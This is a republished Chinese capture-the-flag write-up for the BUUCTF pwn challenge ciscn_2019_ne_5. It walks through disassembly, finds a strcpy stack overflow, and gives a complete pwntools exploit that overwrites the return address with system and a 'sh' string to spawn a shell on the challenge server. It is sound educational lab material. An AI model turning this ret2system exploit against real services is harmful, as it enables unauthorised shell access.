[BUUCTF-pwn]——ciscn_2019_ne_5
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——ciscn_2019_ne_5
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——ciscn_2019_ne_5
- 題目地址:https://buuoj.cn/challenges#ciscn_2019_ne_5
checksec下
在IDA中,竟然不給我反匯編,第一次碰到.
查了下解決方法,在反匯編失敗的地方,單獨反匯編就好.
由于最開始的反匯編失敗,反匯編的代碼可能與實際有些許出入,應該就是反匯編失敗的地方,__isoc99_scanf() 函數. 通過驗證得到第一個是給s1賦值,第二個是給v3賦值;AddLog()函數里面的應該是給src賦值
思路也就出來了: 在1選項中AddLog()給src賦值, 然后,在4選項,通過strcpy給dest賦值,進行棧溢出的利用.
查看一下,有沒有可以利用的字符串,畢竟已經找到了system函數
發現了 ‘sh’ 字符
exploit
from pwn import * context.os='linux' context.arch='i386' context.log_level='debug' p = remote("node3.buuoj.cn",25035) sh_addr = 0x080482ea system_addr = 0x080486B9 p.sendlineafter("Please input admin password:",'administrator') p.sendlineafter("0.Exit\n:",'1') payload = 'a'*(0x48+0x4)+p32(system_addr)+p32(sh_addr)p.sendlineafter("Please input new log info:",payload) p.sendlineafter("0.Exit\n:",'4')p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——ciscn_2019_ne_5的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——ciscn_
- 下一篇: [BUUCTF-pwn]——铁人三项(第